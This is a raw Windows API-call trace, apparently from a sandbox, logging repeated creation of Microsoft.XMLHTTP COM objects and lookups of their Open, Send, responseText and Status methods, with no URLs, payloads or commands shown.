	[0588.830] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0588.830] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0588.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0588.830] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0588.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.830] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0588.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0588.835] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0588.835] SysStringLen (param_1=0x0) returned 0x0
	[0588.835] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0588.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0588.835] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0588.835] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0588.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0588.835] ??2@YAPEAX_K@Z () returned 0x62f310
	[0588.835] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0588.835] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0588.835] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0588.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0588.835] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0588.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.836] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0588.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0588.836] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0588.836] SysStringLen (param_1=0x0) returned 0x0
	[0588.836] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0588.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0588.836] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0588.836] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0588.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0588.836] ??2@YAPEAX_K@Z () returned 0x62f330
	[0588.836] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0588.836] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0588.836] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0588.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0588.836] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.837] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0588.837] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0588.837] SysStringLen (param_1=0x0) returned 0x0
	[0588.837] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0588.837] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0588.837] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0588.837] ??2@YAPEAX_K@Z () returned 0x62f310
	[0588.837] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0588.837] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0588.837] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0588.837] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.838] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0588.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0588.838] longjmp () 
	[0588.838] longjmp () 
	[0588.838] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0588.838] SysStringLen (param_1=0x0) returned 0x0
	[0588.838] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0588.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0588.838] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0588.838] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0588.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0588.838] ??2@YAPEAX_K@Z () returned 0x62f330
	[0588.838] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0588.838] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0588.838] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0588.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0588.839] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0588.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.839] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0588.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0588.839] longjmp () 
	[0588.839] longjmp () 
	[0588.839] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0588.839] SysStringLen (param_1=0x0) returned 0x0
	[0588.839] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0588.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0588.839] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0588.839] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0588.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0588.840] ??2@YAPEAX_K@Z () returned 0x62f310
	[0588.840] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0588.840] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0588.840] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0588.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0588.840] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0588.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0588.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0588.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0588.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0588.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0591.907] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0591.908] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0591.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0591.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0591.908] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0591.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
